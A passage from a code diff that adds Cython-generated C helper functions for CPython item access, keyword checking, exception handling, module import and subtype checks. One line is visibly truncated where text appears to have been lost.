GetItemInt */ +static PyObject *__Pyx_GetItemInt_Generic(PyObject *o, PyObject* j) { + PyObject *r; + if (unlikely(!j)) return NULL; + r = PyObject_GetItem(o, j); + Py_DECREF(j); + return r; +} +static CYTHON_INLINE PyObject *__Pyx_GetItemInt_List_Fast(PyObject *o, Py_ssize_t i, + CYTHON_NCP_UNUSED int wraparound, + CYTHON_NCP_UNUSED int boundscheck) { +#if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + Py_ssize_t wrapped_i = i; + if (wraparound & unlikely(i < 0)) { + wrapped_i += PyList_GET_SIZE(o); + } + if ((!boundscheck) || likely(__Pyx_is_valid_index(wrapped_i, PyList_GET_SIZE(o)))) { + PyObject *r = PyList_GET_ITEM(o, wrapped_i); + Py_INCREF(r); + return r; + } + return __Pyx_GetItemInt_Generic(o, PyInt_FromSsize_t(i)); +#else + return PySequence_GetItem(o, i); +#endif +} +static CYTHON_INLINE PyObject *__Pyx_GetItemInt_Tuple_Fast(PyObject *o, Py_ssize_t i, + CYTHON_NCP_UNUSED int wraparound, + CYTHON_NCP_UNUSED int boundscheck) { +#if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + Py_ssize_t wrapped_i = i; + if (wraparound & unlikely(i < 0)) { + wrapped_i += PyTuple_GET_SIZE(o); + } + if ((!boundscheck) || likely(__Pyx_is_valid_index(wrapped_i, PyTuple_GET_SIZE(o)))) { + PyObject *r = PyTuple_GET_ITEM(o, wrapped_i); + Py_INCREF(r); + return r; + } + return __Pyx_GetItemInt_Generic(o, PyInt_FromSsize_t(i)); +#else + return PySequence_GetItem(o, i); +#endif +} +static CYTHON_INLINE PyObject *__Pyx_GetItemInt_Fast(PyObject *o, Py_ssize_t i, int is_list, + CYTHON_NCP_UNUSED int wraparound, + CYTHON_NCP_UNUSED int boundscheck) { +#if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS && CYTHON_USE_TYPE_SLOTS + if (is_list || PyList_CheckExact(o)) { + Py_ssize_t n = ((!wraparound) | likely(i >= 0)) ? i : i + PyList_GET_SIZE(o); + if ((!boundscheck) || (likely(__Pyx_is_valid_index(n, PyList_GET_SIZE(o))))) { + PyObject *r = PyList_GET_ITEM(o, n); + Py_INCREF(r); + return r; + } + } + else if (PyTuple_CheckExact(o)) { + Py_ssize_t n = ((!wraparound) | likely(i >= 0)) ? i : i + PyTuple_GET_SIZE(o); + if ((!boundscheck) || likely(__Pyx_is_valid_index(n, PyTuple_GET_SIZE(o)))) { + PyObject *r = PyTuple_GET_ITEM(o, n); + Py_INCREF(r); + return r; + } + } else { + PyMappingMethods *mm = Py_TYPE(o)->tp_as_mapping; + PySequenceMethods *sm = Py_TYPE(o)->tp_as_sequence; + if (mm && mm->mp_subscript) { + PyObject *r, *key = PyInt_FromSsize_t(i); + if (unlikely(!key)) return NULL; + r = mm->mp_subscript(o, key); + Py_DECREF(key); + return r; + } + if (likely(sm && sm->sq_item)) { + if (wraparound && unlikely(i < 0) && likely(sm->sq_length)) { + Py_ssize_t l = sm->sq_length(o); + if (likely(l >= 0)) { + i += l; + } else { + if (!PyErr_ExceptionMatches(PyExc_OverflowError)) + return NULL; + PyErr_Clear(); + } + } + return sm->sq_item(o, i); + } + } +#else + if (is_list || PySequence_Check(o)) { + return PySequence_GetItem(o, i); + } +#endif + return __Pyx_GetItemInt_Generic(o, PyInt_FromSsize_t(i)); +} + +/* PyObjectCallOneArg */ +static CYTHON_INLINE PyObject* __Pyx_PyObject_CallOneArg(PyObject *func, PyObject *arg) { + PyObject *args[2] = {NULL, arg}; + return __Pyx_PyObject_FastCall(func, args+1, 1 | __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET); +} + +/* ObjectGetItem */ +#if CYTHON_USE_TYPE_SLOTS +static PyObject *__Pyx_PyObject_GetIndex(PyObject *obj, PyObject *index) { + PyObject *runerr = NULL; + Py_ssize_t key_value; + key_value = __Pyx_PyIndex_AsSsize_t(index); + if (likely(key_value != -1 || !(runerr = PyErr_Occurred()))) { + return __Pyx_GetItemInt_Fast(obj, key_value, 0, 1, 1); + } + if (PyErr_GivenExceptionMatches(runerr, PyExc_OverflowError)) { + __Pyx_TypeName index_type_name = __Pyx_PyType_GetName(Py_TYPE(index)); + PyErr_Clear(); + PyErr_Format(PyExc_IndexError, + "cannot fit '" __Pyx_FMT_TYPENAME "' into an index-sized integer", index_type_name); + __Pyx_DECREF_TypeName(index_type_name); + } + return NULL; +} +static PyObject *__Pyx_PyObject_GetItem_Slow(PyObject *obj, PyObject *key) { + __Pyx_TypeName obj_type_name; + if (likely(PyType_Check(obj))) { + PyObject *meth = __Pyx_PyObject_GetAttrStrNoError(obj, __pyx_n_s_class_getitem); + if (meth) { + PyObject *result = __Pyx_PyObject_CallOneArg(meth, key); + Py_DECREF(meth); + return result; + } + } + obj_type_name = __Pyx_PyType_GetName(Py_TYPE(obj)); + PyErr_Format(PyExc_TypeError, + "'" __Pyx_FMT_TYPENAME "' object is not subscriptable", obj_type_name); + __Pyx_DECREF_TypeName(obj_type_name); + return NULL; +} +static PyObject *__Pyx_PyObject_GetItem(PyObject *obj, PyObject *key) { + PyTypeObject *tp = Py_TYPE(obj); + PyMappingMethods *mm = tp->tp_as_mapping; + PySequenceMethods *sm = tp->tp_as_sequence; + if (likely(mm && mm->mp_subscript)) { + return mm->mp_subscript(obj, key); + } + if (likely(sm && sm->sq_item)) { + return __Pyx_PyObject_GetIndex(obj, key); + } + return __Pyx_PyObject_GetItem_Slow(obj, key); +} +#endif + +/* KeywordStringCheck */ +static int __Pyx_CheckKeywordStrings( + PyObject *kw, + const char* function_name, + int kw_allowed) +{ + PyObject* key = 0; + Py_ssize_t pos = 0; +#if CYTHON_COMPILING_IN_PYPY + if (!kw_allowed && PyDict_Next(kw, &pos, &key, 0)) + goto invalid_keyword; + return 1; +#else + if (CYTHON_METH_FASTCALL && likely(PyTuple_Check(kw))) { + if (unlikely(PyTuple_GET_SIZE(kw) == 0)) + return 1; + if (!kw_allowed) { + key = PyTuple_GET_ITEM(kw, 0); + goto invalid_keyword; + } +#if PY_VERSION_HEX < 0x03090000 + for (pos = 0; pos < PyTuple_GET_SIZE(kw); pos++) { + key = PyTuple_GET_ITEM(kw, pos); + if (unlikely(!PyUnicode_Check(key))) + goto invalid_keyword_type; + } +#endif + return 1; + } + while (PyDict_Next(kw, &pos, &key, 0)) { + #if PY_MAJOR_VERSION < 3 + if (unlikely(!PyString_Check(key))) + #endif + if (unlikely(!PyUnicode_Check(key))) + goto invalid_keyword_type; + } + if (!kw_allowed && unlikely(key)) + goto invalid_keyword; + return 1; +invalid_keyword_type: + PyErr_Format(PyExc_TypeError, + "%.200s() keywords must be strings", function_name); + return 0; +#endif +invalid_keyword: + #if PY_MAJOR_VERSION < 3 + PyErr_Format(PyExc_TypeError, + "%.200s() got an unexpected keyword argument '%.200s'", + function_name, PyString_AsString(key)); + #else + PyErr_Format(PyExc_TypeError, + "%s() got an unexpected keyword argument '%U'", + function_name, key); + #endif + return 0; +} + +/* DivInt[Py_ssize_t] */ +static CYTHON_INLINE Py_ssize_t __Pyx_div_Py_ssize_t(Py_ssize_t a, Py_ssize_t b) { + Py_ssize_t q = a / b; + Py_ssize_t r = a - q*b; + q -= ((r != 0) & ((r ^ b) < 0)); + return q; +} + +/* GetAttr3 */ +static PyObject *__Pyx_GetAttr3Default(PyObject *d) { + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + if (unlikely(!__Pyx_PyErr_ExceptionMatches(PyExc_AttributeError))) + return NULL; + __Pyx_PyErr_Clear(); + Py_INCREF(d); + return d; +} +static CYTHON_INLINE PyObject *__Pyx_GetAttr3(PyObject *o, PyObject *n, PyObject *d) { + PyObject *r; +#if CYTHON_USE_TYPE_SLOTS + if (likely(PyString_Check(n))) { + r = __Pyx_PyObject_GetAttrStrNoError(o, n); + if (unlikely(!r) && likely(!PyErr_Occurred())) { + r = __Pyx_NewRef(d); + } + return r; + } +#endif + r = PyObject_GetAttr(o, n); + return (likely(r)) ? r : __Pyx_GetAttr3Default(d); +} + +/* PyDictVersioning */ +#if CYTHON_USE_DICT_VERSIONS && CYTHON_USE_TYPE_SLOTS +static CYTHON_INLINE PY_UINT64_T __Pyx_get_tp_dict_version(PyObject *obj) { + PyObject *dict = Py_TYPE(obj)->tp_dict; + return likely(dict) ? __PYX_GET_DICT_VERSION(dict) : 0; +} +static CYTHON_INLINE PY_UINT64_T __Pyx_get_object_dict_version(PyObject *obj) { + PyObject **dictptr = NULL; + Py_ssize_t offset = Py_TYPE(obj)->tp_dictoffset; + if (offset) { +#if CYTHON_COMPILING_IN_CPYTHON + dictptr = (likely(offset > 0)) ? (PyObject **) ((char *)obj + offset) : _PyObject_GetDictPtr(obj); +#else + dictptr = _PyObject_GetDictPtr(obj); +#endif + } + return (dictptr && *dictptr) ? __PYX_GET_DICT_VERSION(*dictptr) : 0; +} +static CYTHON_INLINE int __Pyx_object_dict_version_matches(PyObject* obj, PY_UINT64_T tp_dict_version, PY_UINT64_T obj_dict_version) { + PyObject *dict = Py_TYPE(obj)->tp_dict; + if (unlikely(!dict) || unlikely(tp_dict_version != __PYX_GET_DICT_VERSION(dict))) + return 0; + return obj_dict_version == __Pyx_get_object_dict_version(obj); +} +#endif + +/* GetModuleGlobalName */ +#if CYTHON_USE_DICT_VERSIONS +static PyObject *__Pyx__GetModuleGlobalName(PyObject *name, PY_UINT64_T *dict_version, PyObject **dict_cached_value) +#else +static CYTHON_INLINE PyObject *__Pyx__GetModuleGlobalName(PyObject *name) +#endif +{ + PyObject *result; +#if !CYTHON_AVOID_BORROWED_REFS +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX >= 0x030500A1 + result = _PyDict_GetItem_KnownHash(__pyx_d, name, ((PyASCIIObject *) name)->hash); + __PYX_UPDATE_DICT_CACHE(__pyx_d, result, *dict_cached_value, *dict_version) + if (likely(result)) { + return __Pyx_NewRef(result); + } else if (unlikely(PyErr_Occurred())) { + return NULL; + } +#elif CYTHON_COMPILING_IN_LIMITED_API + if (unlikely(!__pyx_m)) { + return NULL; + } + result = PyObject_GetAttr(__pyx_m, name); + if (likely(result)) { + return result; + } +#else + result = PyDict_GetItem(__pyx_d, name); + __PYX_UPDATE_DICT_CACHE(__pyx_d, result, *dict_cached_value, *dict_version) + if (likely(result)) { + return __Pyx_NewRef(result); + } +#endif +#else + result = PyObject_GetItem(__pyx_d, name); + __PYX_UPDATE_DICT_CACHE(__pyx_d, result, *dict_cached_value, *dict_version) + if (likely(result)) { + return __Pyx_NewRef(result); + } + PyErr_Clear(); +#endif + return __Pyx_GetBuiltinName(name); +} + +/* RaiseTooManyValuesToUnpack */ +static CYTHON_INLINE void __Pyx_RaiseTooManyValuesError(Py_ssize_t expected) { + PyErr_Format(PyExc_ValueError, + "too many values to unpack (expected %" CYTHON_FORMAT_SSIZE_T "d)", expected); +} + +/* RaiseNeedMoreValuesToUnpack */ +static CYTHON_INLINE void __Pyx_RaiseNeedMoreValuesError(Py_ssize_t index) { + PyErr_Format(PyExc_ValueError, + "need more than %" CYTHON_FORMAT_SSIZE_T "d value%.1s to unpack", + index, (index == 1) ? "" : "s"); +} + +/* RaiseNoneIterError */ +static CYTHON_INLINE void __Pyx_RaiseNoneNotIterableError(void) { + PyErr_SetString(PyExc_TypeError, "'NoneType' object is not iterable"); +} + +/* ExtTypeTest */ +static CYTHON_INLINE int __Pyx_TypeTest(PyObject *obj, PyTypeObject *type) { + __Pyx_TypeName obj_type_name; + __Pyx_TypeName type_name; + if (unlikely(!type)) { + PyErr_SetString(PyExc_SystemError, "Missing type object"); + return 0; + } + if (likely(__Pyx_TypeCheck(obj, type))) + return 1; + obj_type_name = __Pyx_PyType_GetName(Py_TYPE(obj)); + type_name = __Pyx_PyType_GetName(type); + PyErr_Format(PyExc_TypeError, + "Cannot convert " __Pyx_FMT_TYPENAME " to " __Pyx_FMT_TYPENAME, + obj_type_name, type_name); + __Pyx_DECREF_TypeName(obj_type_name); + __Pyx_DECREF_TypeName(type_name); + return 0; +} + +/* GetTopmostException */ +#if CYTHON_USE_EXC_INFO_STACK && CYTHON_FAST_THREAD_STATE +static _PyErr_StackItem * +__Pyx_PyErr_GetTopmostException(PyThreadState *tstate) +{ + _PyErr_StackItem *exc_info = tstate->exc_info; + while ((exc_info->exc_value == NULL || exc_info->exc_value == Py_None) && + exc_info->previous_item != NULL) + { + exc_info = exc_info->previous_item; + } + return exc_info; +} +#endif + +/* SaveResetException */ +#if CYTHON_FAST_THREAD_STATE +static CYTHON_INLINE void __Pyx__ExceptionSave(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb) { + #if CYTHON_USE_EXC_INFO_STACK && PY_VERSION_HEX >= 0x030B00a4 + _PyErr_StackItem *exc_info = __Pyx_PyErr_GetTopmostException(tstate); + PyObject *exc_value = exc_info->exc_value; + if (exc_value == NULL || exc_value == Py_None) { + *value = NULL; + *type = NULL; + *tb = NULL; + } else { + *value = exc_value; + Py_INCREF(*value); + *type = (PyObject*) Py_TYPE(exc_value); + Py_INCREF(*type); + *tb = PyException_GetTraceback(exc_value); + } + #elif CYTHON_USE_EXC_INFO_STACK + _PyErr_StackItem *exc_info = __Pyx_PyErr_GetTopmostException(tstate); + *type = exc_info->exc_type; + *value = exc_info->exc_value; + *tb = exc_info->exc_traceback; + Py_XINCREF(*type); + Py_XINCREF(*value); + Py_XINCREF(*tb); + #else + *type = tstate->exc_type; + *value = tstate->exc_value; + *tb = tstate->exc_traceback; + Py_XINCREF(*type); + Py_XINCREF(*value); + Py_XINCREF(*tb); + #endif +} +static CYTHON_INLINE void __Pyx__ExceptionReset(PyThreadState *tstate, PyObject *type, PyObject *value, PyObject *tb) { + #if CYTHON_USE_EXC_INFO_STACK && PY_VERSION_HEX >= 0x030B00a4 + _PyErr_StackItem *exc_info = tstate->exc_info; + PyObject *tmp_value = exc_info->exc_value; + exc_info->exc_value = value; + Py_XDECREF(tmp_value); + Py_XDECREF(type); + Py_XDECREF(tb); + #else + PyObject *tmp_type, *tmp_value, *tmp_tb; + #if CYTHON_USE_EXC_INFO_STACK + _PyErr_StackItem *exc_info = tstate->exc_info; + tmp_type = exc_info->exc_type; + tmp_value = exc_info->exc_value; + tmp_tb = exc_info->exc_traceback; + exc_info->exc_type = type; + exc_info->exc_value = value; + exc_info->exc_traceback = tb; + #else + tmp_type = tstate->exc_type; + tmp_value = tstate->exc_value; + tmp_tb = tstate->exc_traceback; + tstate->exc_type = type; + tstate->exc_value = value; + tstate->exc_traceback = tb; + #endif + Py_XDECREF(tmp_type); + Py_XDECREF(tmp_value); + Py_XDECREF(tmp_tb); + #endif +} +#endif + +/* GetException */ +#if CYTHON_FAST_THREAD_STATE +static int __Pyx__GetException(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb) +#else +static int __Pyx_GetException(PyObject **type, PyObject **value, PyObject **tb) +#endif +{ + PyObject *local_type = NULL, *local_value, *local_tb = NULL; +#if CYTHON_FAST_THREAD_STATE + PyObject *tmp_type, *tmp_value, *tmp_tb; + #if PY_VERSION_HEX >= 0x030C00A6 + local_value = tstate->current_exception; + tstate->current_exception = 0; + if (likely(local_value)) { + local_type = (PyObject*) Py_TYPE(local_value); + Py_INCREF(local_type); + local_tb = PyException_GetTraceback(local_value); + } + #else + local_type = tstate->curexc_type; + local_value = tstate->curexc_value; + local_tb = tstate->curexc_traceback; + tstate->curexc_type = 0; + tstate->curexc_value = 0; + tstate->curexc_traceback = 0; + #endif +#else + PyErr_Fetch(&local_type, &local_value, &local_tb); +#endif + PyErr_NormalizeException(&local_type, &local_value, &local_tb); +#if CYTHON_FAST_THREAD_STATE && PY_VERSION_HEX >= 0x030C00A6 + if (unlikely(tstate->current_exception)) +#elif CYTHON_FAST_THREAD_STATE + if (unlikely(tstate->curexc_type)) +#else + if (unlikely(PyErr_Occurred())) +#endif + goto bad; + #if PY_MAJOR_VERSION >= 3 + if (local_tb) { + if (unlikely(PyException_SetTraceback(local_value, local_tb) < 0)) + goto bad; + } + #endif + Py_XINCREF(local_tb); + Py_XINCREF(local_type); + Py_XINCREF(local_value); + *type = local_type; + *value = local_value; + *tb = local_tb; +#if CYTHON_FAST_THREAD_STATE + #if CYTHON_USE_EXC_INFO_STACK + { + _PyErr_StackItem *exc_info = tstate->exc_info; + #if PY_VERSION_HEX >= 0x030B00a4 + tmp_value = exc_info->exc_value; + exc_info->exc_value = local_value; + tmp_type = NULL; + tmp_tb = NULL; + Py_XDECREF(local_type); + Py_XDECREF(local_tb); + #else + tmp_type = exc_info->exc_type; + tmp_value = exc_info->exc_value; + tmp_tb = exc_info->exc_traceback; + exc_info->exc_type = local_type; + exc_info->exc_value = local_value; + exc_info->exc_traceback = local_tb; + #endif + } + #else + tmp_type = tstate->exc_type; + tmp_value = tstate->exc_value; + tmp_tb = tstate->exc_traceback; + tstate->exc_type = local_type; + tstate->exc_value = local_value; + tstate->exc_traceback = local_tb; + #endif + Py_XDECREF(tmp_type); + Py_XDECREF(tmp_value); + Py_XDECREF(tmp_tb); +#else + PyErr_SetExcInfo(local_type, local_value, local_tb); +#endif + return 0; +bad: + *type = 0; + *value = 0; + *tb = 0; + Py_XDECREF(local_type); + Py_XDECREF(local_value); + Py_XDECREF(local_tb); + return -1; +} + +/* SwapException */ +#if CYTHON_FAST_THREAD_STATE +static CYTHON_INLINE void __Pyx__ExceptionSwap(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb) { + PyObject *tmp_type, *tmp_value, *tmp_tb; + #if CYTHON_USE_EXC_INFO_STACK && PY_VERSION_HEX >= 0x030B00a4 + _PyErr_StackItem *exc_info = tstate->exc_info; + tmp_value = exc_info->exc_value; + exc_info->exc_value = *value; + if (tmp_value == NULL || tmp_value == Py_None) { + Py_XDECREF(tmp_value); + tmp_value = NULL; + tmp_type = NULL; + tmp_tb = NULL; + } else { + tmp_type = (PyObject*) Py_TYPE(tmp_value); + Py_INCREF(tmp_type); + #if CYTHON_COMPILING_IN_CPYTHON + tmp_tb = ((PyBaseExceptionObject*) tmp_value)->traceback; + Py_XINCREF(tmp_tb); + #else + tmp_tb = PyException_GetTraceback(tmp_value); + #endif + } + #elif CYTHON_USE_EXC_INFO_STACK + _PyErr_StackItem *exc_info = tstate->exc_info; + tmp_type = exc_info->exc_type; + tmp_value = exc_info->exc_value; + tmp_tb = exc_info->exc_traceback; + exc_info->exc_type = *type; + exc_info->exc_value = *value; + exc_info->exc_traceback = *tb; + #else + tmp_type = tstate->exc_type; + tmp_value = tstate->exc_value; + tmp_tb = tstate->exc_traceback; + tstate->exc_type = *type; + tstate->exc_value = *value; + tstate->exc_traceback = *tb; + #endif + *type = tmp_type; + *value = tmp_value; + *tb = tmp_tb; +} +#else +static CYTHON_INLINE void __Pyx_ExceptionSwap(PyObject **type, PyObject **value, PyObject **tb) { + PyObject *tmp_type, *tmp_value, *tmp_tb; + PyErr_GetExcInfo(&tmp_type, &tmp_value, &tmp_tb); + PyErr_SetExcInfo(*type, *value, *tb); + *type = tmp_type; + *value = tmp_value; + *tb = tmp_tb; +} +#endif + +/* Import */ +static PyObject *__Pyx_Import(PyObject *name, PyObject *from_list, int level) { + PyObject *module = 0; + PyObject *empty_dict = 0; + PyObject *empty_list = 0; + #if PY_MAJOR_VERSION < 3 + PyObject *py_import; + py_import = __Pyx_PyObject_GetAttrStr(__pyx_b, __pyx_n_s_import); + if (unlikely(!py_import)) + goto bad; + if (!from_list) { + empty_list = PyList_New(0); + if (unlikely(!empty_list)) + goto bad; + from_list = empty_list; + } + #endif + empty_dict = PyDict_New(); + if (unlikely(!empty_dict)) + goto bad; + { + #if PY_MAJOR_VERSION >= 3 + if (level == -1) { + if ((1) && (strchr(__Pyx_MODULE_NAME, '.'))) { + #if CYTHON_COMPILING_IN_LIMITED_API + module = PyImport_ImportModuleLevelObject( + name, empty_dict, empty_dict, from_list, 1); + #else + module = PyImport_ImportModuleLevelObject( + name, __pyx_d, empty_dict, from_list, 1); + #endif + if (unlikely(!module)) { + if (unlikely(!PyErr_ExceptionMatches(PyExc_ImportError))) + goto bad; + PyErr_Clear(); + } + } + level = 0; + } + #endif + if (!module) { + #if PY_MAJOR_VERSION < 3 + PyObject *py_level = PyInt_FromLong(level); + if (unlikely(!py_level)) + goto bad; + module = PyObject_CallFunctionObjArgs(py_import, + name, __pyx_d, empty_dict, from_list, py_level, (PyObject *)NULL); + Py_DECREF(py_level); + #else + #if CYTHON_COMPILING_IN_LIMITED_API + module = PyImport_ImportModuleLevelObject( + name, empty_dict, empty_dict, from_list, level); + #else + module = PyImport_ImportModuleLevelObject( + name, __pyx_d, empty_dict, from_list, level); + #endif + #endif + } + } +bad: + Py_XDECREF(empty_dict); + Py_XDECREF(empty_list); + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(py_import); + #endif + return module; +} + +/* ImportDottedModule */ +#if PY_MAJOR_VERSION >= 3 +static PyObject *__Pyx__ImportDottedModule_Error(PyObject *name, PyObject *parts_tuple, Py_ssize_t count) { + PyObject *partial_name = NULL, *slice = NULL, *sep = NULL; + if (unlikely(PyErr_Occurred())) { + PyErr_Clear(); + } + if (likely(PyTuple_GET_SIZE(parts_tuple) == count)) { + partial_name = name; + } else { + slice = PySequence_GetSlice(parts_tuple, 0, count); + if (unlikely(!slice)) + goto bad; + sep = PyUnicode_FromStringAndSize(".", 1); + if (unlikely(!sep)) + goto bad; + partial_name = PyUnicode_Join(sep, slice); + } + PyErr_Format( +#if PY_MAJOR_VERSION < 3 + PyExc_ImportError, + "No module named '%s'", PyString_AS_STRING(partial_name)); +#else +#if PY_VERSION_HEX >= 0x030600B1 + PyExc_ModuleNotFoundError, +#else + PyExc_ImportError, +#endif + "No module named '%U'", partial_name); +#endif +bad: + Py_XDECREF(sep); + Py_XDECREF(slice); + Py_XDECREF(partial_name); + return NULL; +} +#endif +#if PY_MAJOR_VERSION >= 3 +static PyObject *__Pyx__ImportDottedModule_Lookup(PyObject *name) { + PyObject *imported_module; +#if PY_VERSION_HEX < 0x030700A1 || (CYTHON_COMPILING_IN_PYPY && PYPY_VERSION_NUM < 0x07030400) + PyObject *modules = PyImport_GetModuleDict(); + if (unlikely(!modules)) + return NULL; + imported_module = __Pyx_PyDict_GetItemStr(modules, name); + Py_XINCREF(imported_module); +#else + imported_module = PyImport_GetModule(name); +#endif + return imported_module; +} +#endif +#if PY_MAJOR_VERSION >= 3 +static PyObject *__Pyx_ImportDottedModule_WalkParts(PyObject *module, PyObject *name, PyObject *parts_tuple) { + Py_ssize_t i, nparts; + nparts = PyTuple_GET_SIZE(parts_tuple); + for (i=1; i < nparts && module; i++) { + PyObject *part, *submodule; +#if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + part = PyTuple_GET_ITEM(parts_tuple, i); +#else + part = PySequence_ITEM(parts_tuple, i); +#endif + submodule = __Pyx_PyObject_GetAttrStrNoError(module, part); +#if !(CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS) + Py_DECREF(part); +#endif + Py_DECREF(module); + module = submodule; + } + if (unlikely(!module)) { + return __Pyx__ImportDottedModule_Error(name, parts_tuple, i); + } + return module; +} +#endif +static PyObject *__Pyx__ImportDottedModule(PyObject *name, PyObject *parts_tuple) { +#if PY_MAJOR_VERSION < 3 + PyObject *module, *from_list, *star = __pyx_n_s__3; + CYTHON_UNUSED_VAR(parts_tuple); + from_list = PyList_New(1); + if (unlikely(!from_list)) + return NULL; + Py_INCREF(star); + PyList_SET_ITEM(from_list, 0, star); + module = __Pyx_Import(name, from_list, 0); + Py_DECREF(from_list); + return module; +#else + PyObject *imported_module; + PyObject *module = __Pyx_Import(name, NULL, 0); + if (!parts_tuple || unlikely(!module)) + return module; + imported_module = __Pyx__ImportDottedModule_Lookup(name); + if (likely(imported_module)) { + Py_DECREF(module); + return imported_module; + } + PyErr_Clear(); + return __Pyx_ImportDottedModule_WalkParts(module, name, parts_tuple); +#endif +} +static PyObject *__Pyx_ImportDottedModule(PyObject *name, PyObject *parts_tuple) { +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX >= 0x030400B1 + PyObject *module = __Pyx__ImportDottedModule_Lookup(name); + if (likely(module)) { + PyObject *spec = __Pyx_PyObject_GetAttrStrNoError(module, __pyx_n_s_spec); + if (likely(spec)) { + PyObject *unsafe = __Pyx_PyObject_GetAttrStrNoError(spec, __pyx_n_s_initializing); + if (likely(!unsafe || !__Pyx_PyObject_IsTrue(unsafe))) { + Py_DECREF(spec); + spec = NULL; + } + Py_XDECREF(unsafe); + } + if (likely(!spec)) { + PyErr_Clear(); + return module; + } + Py_DECREF(spec); + Py_DECREF(module); + } else if (PyErr_Occurred()) { + PyErr_Clear(); + } +#endif + return __Pyx__ImportDottedModule(name, parts_tuple); +} + +/* ssize_strlen */ +static CYTHON_INLINE Py_ssize_t __Pyx_ssize_strlen(const char *s) { + size_t len = strlen(s); + if (unlikely(len > PY_SSIZE_T_MAX)) { + PyErr_SetString(PyExc_OverflowError, "byte string is too long"); + return -1; + } + return (Py_ssize_t) len; +} + +/* FastTypeChecks */ +#if CYTHON_COMPILING_IN_CPYTHON +static int __Pyx_InBases(PyTypeObject *a, PyTypeObject *b) { + while (a) { + a = __Pyx_PyType_GetSlot(a, tp_base, PyTypeObject*); + if (a == b) + return 1; + } + return b == &PyBaseObject_Type; +} +static CYTHON_INLINE int __Pyx_IsSubtype(PyTypeObject *a, PyTypeObject *b) { + PyObject *mro; + if (a == b) return 1; + mro = a->tp_mro; + if (likely(mro)) { + Py_ssize_t i, n; + n = PyTuple_GET_SIZE(mro); + for (i = 0; i < n; i++) { + if (PyTuple_GET_ITEM(mro, i) == (PyObject *)b) + return 1; + } + return 0; + } + return __Pyx_InBases(a, b); +} +static CYTHON_INLINE int __Pyx_IsAnySubtype2(PyTypeObject *cls, PyTypeObject *a, PyTypeObject *b) { + PyObject *mro; + if (cls == a || cls == b) return 1; + mro = cls->tp_mro; + if (likely(mro)) { + Py_ssize_t i, n; + n = PyTuple_GET_SIZE(mro); + for (i = 0; i < n; i++) { + PyObject *base = PyTuple_GET_ITEM(mro, i); + if (base == (PyObject *)a || base == (PyObject *)b) + return 1; + } + return 0; + } + return __Pyx_InBases(cls, a) || __Pyx_InBases(cls, b); +} +#if PY_MAJOR_VERSION == 2 +static int __Pyx_inner_PyErr_GivenExceptionMatches2(PyObject *err, PyObject* exc_type1, PyObject* exc_type2) { + PyObject *exception, *value, *tb; + int res; + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ErrFetch(&exception, &value, &tb); + res = exc_type1 ? PyObject_IsSubclass(err, exc_type1) : 0; + if (unlikely(res == -1)) { + PyErr_WriteUnraisable(err); + res = 0; + } + if (!res) { + res = PyObject_IsSubclass(err, exc_type2); + if (unlikely(res == -1)) { + PyErr_WriteUnraisable(err); + res = 0; + } + } + __Pyx_ErrRestore(exception, value, tb); + return res; +} +#else +static CYTHON_INLINE int __Pyx_inner_PyErr_GivenExceptionMatches2(PyObject *err, PyObject* exc_type1, PyObject *exc_type2) { + if (exc_type1) { + return __Pyx_IsAnySubtype2((PyTypeObject*)err, (PyTypeObject*)exc_type1, (PyTypeObject*)exc_type2); + } else { + return __Pyx_IsSubtype((PyTypeObject*)err, (PyTypeObject*)exc_type2); + } +} +#endif +static int __Pyx_PyErr_GivenExceptionMatchesTuple(PyObject *exc_type, PyObject *tuple) { + Py_ssize_t i, n; + assert(PyExceptionClass_Check(exc_type)); + n = PyTuple_GET_SIZE(tuple); +#if PY_MAJOR_VERSION >= 3 + for (i=0; itp_as_sequence && type->tp_as_sequence->sq_repeat)) { + return type->tp_as_sequence->sq_repeat(seq, mul); + } else +#endif + { + return __Pyx_PySequence_Multiply_Generic(seq, mul); + } +} + +/* SetItemInt */ +static int __Pyx_SetItemInt_Generic(PyObject *o, PyObject *j, PyObject *v) { + int r; + if (unlikely(!j)) return -1; + r = PyObject_SetItem(o, j, v); + Py_DECREF(j); + return r; +} +static CYTHON_INLINE int __Pyx_SetItemInt_Fast(PyObject *o, Py_ssize_t i, PyObject *v, int is_list, + CYTHON_NCP_UNUSED int wraparound, CYTHON_NCP_UNUSED int boundscheck) { +#if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS && CYTHON_USE_TYPE_SLOTS + if (is_list || PyList_CheckExact(o)) { + Py_ssize_t n = (!wraparound) ? i : ((likely(i >= 0)) ? i : i + PyList_GET_SIZE(o)); + if ((!boundscheck) || likely(__Pyx_is_valid_index(n, PyList_GET_SIZE(o)))) { + PyObject* old = PyList_GET_ITEM(o, n); + Py_INCREF(v); + PyList_SET_ITEM(o, n, v); + Py_DECREF(old); + return 1; + } + } else { + PyMappingMethods *mm = Py_TYPE(o)->tp_as_mapping; + PySequenceMethods *sm = Py_TYPE(o)->tp_as_sequence; + if (mm && mm->mp_ass_subscript) { + int r; + PyObject *key = PyInt_FromSsize_t(i); + if (unlikely(!key)) return -1; + r = mm->mp_ass_subscript(o, key, v); + Py_DECREF(key); + return r; + } + if (likely(sm && sm->sq_ass_item)) { + if (wraparound && unlikely(i < 0) && likely(sm->sq_length)) { + Py_ssize_t l = sm->sq_length(o); + if (likely(l >= 0)) { + i += l; + } else { + if (!PyErr_ExceptionMatches(PyExc_OverflowError)) + return -1; + PyErr_Clear(); + } + } + return sm->sq_ass_item(o, i, v); + } + } +#else +#if CYTHON_COMPILING_IN_PYPY + if (is_list || (PySequence_Check(o) && !PyDict_Check(o))) +#else + if (is_list || PySequence_Check(o)) +#endif + { 